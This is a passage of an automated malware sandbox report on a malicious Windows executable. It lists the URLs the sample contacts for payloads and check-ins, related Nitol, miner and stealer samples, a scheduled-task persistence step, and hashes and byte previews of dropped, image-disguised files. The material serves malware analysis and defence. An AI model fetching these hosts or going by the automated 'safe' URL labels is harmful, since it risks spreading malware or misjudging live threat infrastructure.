        • Avira URL Cloud: safe
        unknown
        https://khec3y.oss-cn-beijing.aliyuncs.com/s.datfalse
        • Avira URL Cloud: safe
        unknown
        https://khec3y.oss-cn-beijing.aliyuncs.com/b.giffalse
        • Avira URL Cloud: safe
        unknown
        https://khec3y.oss-cn-beijing.aliyuncs.com/c.giffalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://khec3y.oss-cn-beijing.aliyuncs.com/i149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://ocsp.thawte.com0149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.dr, 189atohci.sys.0.drfalse
          high
          https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifB149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://khec3y.oss-cn-beijing.aliyuncs.com/u149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.symauth.com/cps0(149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drfalse
            high
            https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifhttps://khec3y.oss-cn-beijing.aliyuncs.com/b.gifhttp149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif%149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://khec3y.oss-cn-beijing.aliyuncs.com/7-2476756634-1002149876985-734579485.05.exe, 00000000.00000003.2565027405.0000000000624000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://khec3y.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/149876985-734579485.05.exe, 00000000.00000003.2589723145.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://khec3y.oss-cn-beijing.aliyuncs.com/Jc149876985-734579485.05.exe, 00000000.00000003.2589830190.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://crl.thawte.com/ThawteTimestampingCA.crl0149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.dr, 189atohci.sys.0.drfalse
              high
              https://khec3y.oss-cn-beijing.aliyuncs.com/a.gif~149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://toro.d.dooo.jp/report/receive.cgi?exe=ClockPod149876985-734579485.05.exefalse
              • Avira URL Cloud: safe
              unknown
              http://www.symauth.com/rpa00149876985-734579485.05.exe, 00000000.00000003.2642018037.00000000047A2000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589606274.00000000047A1000.00000004.00000020.00020000.00000000.sdmp, S1JCyi.exe.0.drfalse
                high
                http://toro.d.dooo.jp/index.html)k0149876985-734579485.05.exefalse
                • Avira URL Cloud: safe
                unknown
                https://khec3y.oss-cn-beijing.aliyuncs.com/149876985-734579485.05.exe, 00000000.00000003.2565027405.0000000000624000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.0000000000619000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589830190.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://khec3y.oss-cn-beijing.aliyuncs.com/a.gifR149876985-734579485.05.exe, 00000000.00000003.2565027405.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://khec3y.oss-cn-beijing.aliyuncs.com/b.gifj149876985-734579485.05.exe, 00000000.00000003.2589723145.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://khec3y.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002149876985-734579485.05.exe, 00000000.00000003.2565027405.0000000000624000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2589723145.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://toro.d.dooo.jp/index.htmlTORO149876985-734579485.05.exefalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                59.110.190.21
                khec3y.oss-cn-beijing.aliyuncs.comChina
                37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1590025
                Start date and time:2025-01-13 13:45:13 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 34s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:149876985-734579485.05.exe
                Detection:MAL
                Classification:mal80.evad.winEXE@4/12@2/1
                EGA Information:
                • Successful, ratio: 33.3%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target S1JCyi.exe, PID 1716 because there are no executed function
                • Execution Graph export aborted for target S1JCyi.exe, PID 2380 because there are no executed function
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                07:46:08API Interceptor941x Sleep call for process: 149876985-734579485.05.exe modified
                12:47:50Task SchedulerRun new task: MUzXN path: C:\Users\user\Documents\S1JCyi.exe s>"Y5(
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                • 118.178.60.9
                1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                • 118.178.60.9
                2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                • 118.178.60.9
                2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                • 118.178.60.9
                2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                • 118.178.60.9
                2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                • 118.178.60.9
                2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse
                • 118.178.60.9
                e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                • 118.178.60.9
                23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                • 118.178.60.9
                287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                • 118.178.60.9
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdelitebotnet.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                • 106.14.74.100
                trow.exeGet hashmaliciousUnknownBrowse
                • 39.99.233.155
                13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                • 47.101.28.195
                3.elfGet hashmaliciousUnknownBrowse
                • 8.156.156.245
                i686.elfGet hashmaliciousMiraiBrowse
                • 47.104.110.148
                res.ppc.elfGet hashmaliciousUnknownBrowse
                • 47.114.43.16
                res.mpsl.elfGet hashmaliciousUnknownBrowse
                • 8.187.66.138
                6.elfGet hashmaliciousUnknownBrowse
                • 8.130.209.218
                1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                • 118.178.60.9
                1387457-38765948.15.exeGet hashmaliciousUnknownBrowse
                • 47.101.26.25
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37f463bf4616ecd445d4a1937da06e19YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                • 59.110.190.21
                PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                • 59.110.190.21
                PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                • 59.110.190.21
                13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                • 59.110.190.21
                Setup.msiGet hashmaliciousUnknownBrowse
                • 59.110.190.21
                L7GNkeVm5e.exeGet hashmaliciousLummaCBrowse
                • 59.110.190.21
                NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                • 59.110.190.21
                g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                • 59.110.190.21
                lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                • 59.110.190.21
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\Documents\S1JCyi.exe13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                  1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                    1387457-38765948.15.exeGet hashmaliciousUnknownBrowse
                      2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                        2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                          2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                            2976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                              2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                  2362476847-83854387.07.exeGet hashmaliciousUnknownBrowse
                                    Process:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):3892010
                                    Entropy (8bit):7.995495589600101
                                    Encrypted:true
                                    SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                    MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                    SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                    SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                    SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):5.26512450612984
                                    Encrypted:false
                                    SSDEEP:6:WUGUsW11j2lCrCa2BIDRhCgcTiv16QyM7OdUzW9E40/qcX:NGU311hMBIDRh5BNdyWgUzWg3
                                    MD5:0C3C81CC59CB35FD96753C541097C3E8
                                    SHA1:20B1A99339A1FA77838A659BD795043FEB3A8188
                                    SHA-256:3E78F5E06792F69F0224A89C874771D73F8B83F1C4CE00E9C768E026E4746979
                                    SHA-512:EDD26B7DA762C0AAAD7278489D476211B5A0ED57C7DDD49CC3483754D1A755DE9AB40ADE3EAD6562CCAD1BD20450B2ECEC7003728687E17A92E07E0A0F9C45AD
                                    Malicious:false
                                    Reputation:low
                                    Preview:....l%00[XUS`*}<OO._1r=:SPST3z58QAMV5%x5ZX.Tz3=222222222222222222222222222222222ZFFB1xmm....=w a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33X[VPc)~?LL.\2q>9PSPW0y6;RBNU6&{6Y[.U{2<333333333333333333333333333333333[GGC0yll....<v!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                                    Process:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):125333
                                    Entropy (8bit):7.993522712936246
                                    Encrypted:true
                                    SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                    MD5:2CA9F4AB0970AA58989D66D9458F8701
                                    SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                    SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                    SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                    Category:dropped
                                    Size (bytes):8299
                                    Entropy (8bit):7.9354275320361545
                                    Encrypted:false
                                    SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                    MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                    SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                    SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                    SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                    Malicious:false
                                    Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............
                                    Process:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):10681
                                    Entropy (8bit):7.866148090449211
                                    Encrypted:false
                                    SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                    MD5:10A818386411EE834D99AE6B7B68BE71
                                    SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                    SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                    SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                    Malicious:false
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):135589
                                    Entropy (8bit):7.995304392539578
                                    Encrypted:true
                                    SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                    MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                    SHA1:561836F6228E24180238DF9456707A2443C5795C
                                    SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                    SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                    Malicious:false
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):28272
                                    Entropy (8bit):7.711598601816944
                                    Encrypted:false
                                    SSDEEP:384:9wegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQ4:j5F1FUdy422IK+gAZt2i0YPpQn4GMX
                                    MD5:B10ADDCAA76BBC279C2822E8AB49889E
                                    SHA1:E338A397E8C3767258F1FE709582F431DD89E03C
                                    SHA-256:492FF71378B2013A67816BFD15A714FBC8F6295B0D9E146F8A8A2ECA8990934A
                                    SHA-512:A6296868E9DC4C0988CFCA73DA7FEF054A362165617E7E421CD50A03AA14844AC0A51542636FB1C357458D60F01B97D62E0A14AB69518D8BA359549AE80A7856
                                    Malicious:false
                                    Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                    Process:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):3889557
                                    Entropy (8bit):7.999938755080913
                                    Encrypted:true
                                    SSDEEP:98304:8AnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:XndLOZS/DtpPJRO8OHBL4f2UQI+A
                                    MD5:5D8F1D2E8DDBE5BE2FEE9D6EF0D36559
                                    SHA1:C2C70E38905F407F6B1F871978EF6D6073E7E55F
                                    SHA-256:8EB569688736A97A3A935175868CFD8C81C95B6DE4010826E3686EF87C93386E
                                    SHA-512:A14358A9314C212E0DE3A34C505AA004A7E8425408FC2D7C38F72A6FDA4BBA466597E65F31A1E5DF77CCEDA74072B6B1019DB1073243EC6A4C4B40B2E6847413
                                    Malicious:false
                                    Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Qc.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                    Process:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):133136
                                    Entropy (8bit):6.350273548571922
                                    Encrypted:false
                                    SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                    MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                    SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                    SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                    SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: 13478674376-78423498.01.exe, Detection: malicious, Browse
                                    • Filename: 1387457-38765948.15.exe, Detection: malicious, Browse
                                    • Filename: 1387457-38765948.15.exe, Detection: malicious, Browse
                                    • Filename: 2976587-987347589.07.exe, Detection: malicious, Browse
                                    • Filename: 2976587-987347589.08.exe, Detection: malicious, Browse
                                    • Filename: 2976587-987347589.08.exe, Detection: malicious, Browse
                                    • Filename: 2976587-987347589.07.exe, Detection: malicious, Browse
                                    • Filename: 2873466535874-68348745.02.exe, Detection: malicious, Browse
                                    • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                    • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\149876985-734579485.05.exe
                                    File Type:GIF image data, version 89a, 10 x 10
                                    Category:dropped
                                    Size (bytes):8228
                                    Entropy (8bit):7.979008400522679
                                    Encrypted:false
                                    SSDEEP:192:BBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:BBuNhyTlBU2dp+1XrBuCgp9vU0l
                                    MD5:71C9966BC7329FC3BF900FF1CEE2B1AD
